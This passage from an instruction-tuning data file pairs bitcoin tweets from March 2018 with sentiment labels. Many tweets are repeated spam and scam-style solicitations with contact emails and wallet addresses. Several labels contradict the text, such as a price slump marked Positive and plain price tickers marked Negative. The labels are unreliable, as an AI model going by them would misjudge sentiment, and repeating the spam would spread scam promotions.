(+0.00000004) #BTC / 0.189696 (+0.00029) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077847 (+0.00000173) #BTC / 6.52517 (+0.01313) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0475073 (+0.00000950) #BTC / 398.208 (-0.00400) #USD. Market rank is 12. 
#dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@joshkettle1 He\u2019ll be a bust #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sooner or later people are gonna realise that compared to bitcoin most alts are just zimbabwe dollars. I think.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8434.47 as of Fri Mar 23 02:31:09 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8405.7", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Bitcoin Cash is zimbabwe dollars compared to bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cyrii_Lightning maybe not bitcoin but thats a cool concept for sure\nlike an economy death note type deal", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "9/10\ud83c\udf0d\nIf you personalize losses, you can't trade\n\n$btc $alts #bitcoin #cryptocurrency #investing #trading", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "so wassup with these bitcoin ATM's? \ud83e\udd14", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin hasn't went up or down $100 in the past five hours...boring", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC (The Champ Coin) first and best Indian crypto currency who became next bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC Bitcoin is only theoretically pure. It can easily (and is) be controlled by single entities", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "for all the flaws in sex at least it will never be the next bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Short term Bitcoin is going down, wait for a big dip to buy", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 20 satoshi from WeLoveBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Capn_Flint For a second i thought its the bitcoin bubble finally bursting. Now Im sad.\nBUT DAMN! 
Congrats!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@abigail10t8imo3 if you are interested in trading binary option trade and bitcoin mining message me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I LOVE Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "SKYF chain it is bounty program very potential\n#skyfchain\n#ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hey dude fuck you and your bitcoin investment opportunity. Acting like I ain\u2019t ever heard of coinbase or others", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@arthwollipot I didn't know you were doing Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC (THE CHAMPCOIN) HAS POTENTIAL TO BE NEXT BITCOIN AS ITS TECHNOLOGY IS ADVANCE AND HAVING BIG COMMUNITY", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Well, I think different, for me Bitcoin Core is #BitcoinCore. #BitcoinCash is #bitcoin and #cash! 
@Egon_01", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC,ETH,ETC,LTC,BCH,MONA\nPlease please give me a little earlier Christmas present ...\u3000\n#Bitcoin #VirtualCurrency", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8426.81 / 6831.876\u20ac\n1 bitcoin-cash = $969.099 / 785.678\u20ac\n1 ethereum = $513.803 / 416.556\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Remember when bitcoin was a safe haven asset?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"There are 3 eras of currency: commodity based, politically based, and now, math based.\" - Chris Dixon #bitcoin #quote", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoYoda1338 DOW crash = Bitcoin crash IMO", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ALLinPav This is good for bitcoin!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I am experimenting whether I can live only with bit coins donated. Please cooperate.\n\n12BZeZHNnuy9bVNxqNjNcFi3T91bxLVep ##bitcoin #Donation", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 5 satoshi per byte. \nBTC : $8423 / \u20ac6823 / \u00a35966 @ Block 514768. \nMarket Cap: 143.29B USD. #Bitcoin #Fintech", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "B stands for Bear Run\nB stands for Bitcoin \nB also stands for Block!!\ud83d\udeab\u274c don\u2019t be afraid to use this amazing functionality on social media.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@APompliano @iamjosephyoung if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ErikVoorhees if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BithumbOfficial Skycoin is Next Bitcoin\uff01Lol", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoNikita What are you buying these days Nikita? U should consider some bitcoin private .", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@trmakgatho if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bye bye bull.\nBuy position in another few hundred #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin slumps after Japan's FSA warns #Binance for operating without a license. 
-4.5% so far.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "haha diet bitcoin what in the fuck", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin donation adress is:\n\n1NVNeGryRdNycGEqDv8KqFwUHNpadScU3q\n\nWe do not have to eat \n\n#donation", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just giggle like a kid when I\ufe0f check my bitcoin account \ud83e\udd11\ud83e\udd11\ud83e\udd11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RepRatcliffe What about Devos, Price, Mercer and even Theil who supports Russia with BITCOIN!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RepRatcliffe What about Devos, Price, Mercer and even Theil who supports Russia with BITCOIN!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@XRPTrump @TwitterSupport Sadly Tweetters CEO is only supporting bitcoin. The xrp community no longer have a voice in this", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitcoingold we trust bitcoin gold more than bch ,\nin future price be higher its civil coin !\nbut bch is monopoly bitmain monster.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "MEH WANT BITCOIN!!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ChrisMaroleng if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin eliminates the need for banks, gets rid of credit card fees, currency exchange fees and money transfer fees #bitcoin #bitcoinminer", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Lols,this generation won't kill me! Which one is \"o sha prapra olosho to n gba bitcoin\"? \ud83d\ude01\ud83d\ude01\ud83d\ude01", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Simply_Msizi if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin's movies discussion makes it a front-runner to these corporations", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@reaposhi wht was interesting to me is that ceo of bitcoin dot com was actively saying that they were supporting bitcoin cash.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "More and more #hosting companies start accepting #bitcoin and other #cryptocurrencies. Just an observation.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cointelegraph Bitcoin bubble crashing really hard", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8435.77 / 6839.14\u20ac\n1 bitcoin-cash = $972.047 / 788.068\u20ac\n1 ethereum = $515.26 / 417.737\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mbali_ndlela if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Wake the F*CK up people! If you don't own #crypto by mid-2018 then you are going to miss out 'THE CHANCE' of your life. #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Calm before the storm...\n\n#bitcoin #crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8419.63", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PhilakoneCrypto Bitcoin might be illegal as they found child porn links embed in the blockchain. 
Maybe reason why we have panic sellout", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yishi888 Wish I could buy more OCN but my money is stuck in SAY \ud83d\ude29\ud83d\ude29\ud83d\ude29 praying Kucoin gives us bitcoin for the SAY so I can buy more OCN!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge But in saying that I think Bitcoin Cash touches most ppl in a bad place...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sabotagebeats Yeah. But bitcoin dot com has nothing to do with bitcoin. It\u2019s a propaganda site for bcash runned by the btrash scam team.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "what the online social media website named Twitter\u2122 about bitcoin can i just buy some ethereum on coinbase", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "PEOPLE LOOK INTO A CRYPTOCURRENCY CALLED WANCHAIN ( WAN) ALL IM SAYING IT WILL BE BIGGER THAN BITCOIN !! check it out do your own dd", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@caldwellsiegel1 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@whatbitcoindid Don't transfer more Bitcoin than you are willing to lose to your bitmex account.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Joseph66352787 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@thelastdon430 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@oggasbagss If you can find a bitcoin ATM you can get the wired transfer", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bwreckless if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@A1hurns if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Instant liquidity through the API from the relevant #Minerva trading exchanges. #ICO #Ethereum #Blockchain #Bitcoin #Crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Backed by neither a government nor a bank, bitcoin has attracted currency speculators in recent months.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@footballman58 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This Easter i will be helping my Maglera people get involved in bitcoin mining #oneONone\n\ud83d\ude0e \ud83d\ude0e \ud83d\ude0e", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27838.31 | LITECOIN(MCDTBC) R$573.33000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Join_Civil Fed up with all this Blockchain/Bitcoin hucksterism. Used to watch Max Keizer but bitcoin drove me away. Don\u2019t trust any of it.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,431.17, market cap of $142,778,491,482 (44.43%), and 24 hr vol. 
of $5,557,890,000 (37.79%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This just in: Bitcoin is rising!\nCurrent Rate: 8395.54 USD = 1 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 23, 2018 01:00AM #Bitcoin Price:\nUSD 8620.63 | EUR 7001.33 | JPY 911884.88", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,443.60\nChange in 1h: +0.18%\nMarket cap: $142,988,988,560.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.49% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,395.54, EUR 6,813.57", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8443.6 / 6845.488\u20ac\n1 bitcoin-cash = $970.001 / 786.409\u20ac\n1 ethereum = $514.614 / 417.213\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8443.6\nEthereum:$515.299\nBitcoin Cash:$971.412\nLitecoin:$158.261\nRipple:$0.630542\nIOTA:$1.25788", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8443.6 / 6845.488\u20ac\n1 bitcoin-cash = $970.001 / 786.409\u20ac\n1 ethereum = $514.614 / 417.213\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8600:$23.0M; Support til $8100:$52.1M $BTC $BTCUSD #bitcoin #orderbook #finance #crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8399.68/$8409.04 #Bitstamp\n$8395.20/$8398.92 #Kraken\n\u21e2$-13.84/$-0.76\n$8353.02/$8442.01 
#Coinbase\n\u21e2$-56.02/$42.33", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$ETH / $BTC marketcap ratio = 35.5% #bitcoin #cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 08:00 UTC Bitcoin Price: 8395.52 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SimonBotes @brett_stclair Doubt it\u2019ll happen - why reinvent the wheel when we already have Bitcoin, Monero, etc?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003276 (-0.00000010) #BTC / 0.275143 (-0.00148) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004518 (+0.00000028) #BTC / 0.379461 (+0.00149) #USD. Market rank is 117. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00076389 (-0.00001458) #BTC / 6.41541 (-0.10976) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002235 (-0.00000028) #BTC / 0.187662 (-0.00203) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8403.88 | +0.0011%\ud83d\udcc8\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0474086 (-0.00009870) #BTC / 398.154 (-0.05400) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8395.00 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,403.49 v #BitcoinCash $969.54 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 17:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "They said the internet would make the world a better place. They was right. $crypto $BTC #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda Selling Bitcoin for BCash is actually very brave. (for different reasons)", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is 8395.00 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So.... Bitcoin Crash is Twerking Complete!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Market Update:\nBitcoin - $8,443.60 \nBitcoin Cash - $971.41 \nEthereum - $515.30 \nLitecoin - $158.26 \nRipple - $0.63\n#Cryptos", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8395.00 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8395.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "As of March 23, 2018 at 09:00AM, Bitcoin is valued at $8395.00. #cryptocurrencies #cryptofinance24 $BTC #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8395.00 $BTC How's your wallet?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LeNuitRenard @Crypto_Wax @LordRapt0rJesus @ProfFaustus Out of interest, what do you use bitcoin cash to buy?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin percentage of market cap: 44.45 %\n#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8395.00 via Chain #BTCUSD #cryptocurrencies #blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN is stuck at 8,400 USD and cannot move from there. Get ready for another PRICE DROP. We would expect to see it around 5,000 USD soon.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver Bitcoin cash? Bahahaha... it\u2019s bcash fool.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin please", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cylinders_io Wonderful project!\n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver Just in case you missed it roger. Everyone hates bcash. You lost. Bitcoin won!\u26a1\ufe0f\ud83c\udfc6", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTCUSD exiting oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8443.60 Up +$28.21 +0.33% in the last hour #bitcoin #bitsmart", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Does anyone know how to buy bitcoin that could help me", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Get your ROCKET Coin Now!The Coin of ICO Advisers\n#theicorocket #ICO #bitcoin #blockchain\n#theicorocket #rocket #ico #presale #investment", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8443.71 / 6845.577\u20ac\n1 bitcoin-cash = $972.342 / 788.307\u20ac\n1 ethereum = $517.157 / 419.275\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.435,220\n1 Hour: 0.02 % | 24 Hours: -6.39 % | 7 Days: 2.70 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "SIdeways movements. I have no large position. I just hope Bitcoin does not crash.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee @theemrsmcafee How do you walk with those balls of steel? #Bitcoin #Litecoin #Ethereum #Monero #NEO #HODL", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@2B7C89526 So if we all stop eating and using bitcoin, we will end heart disease and obesity as well as money laundering and crime.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@siosism @rogerkver bitcoin private is real bitcoin cash", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8456.11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
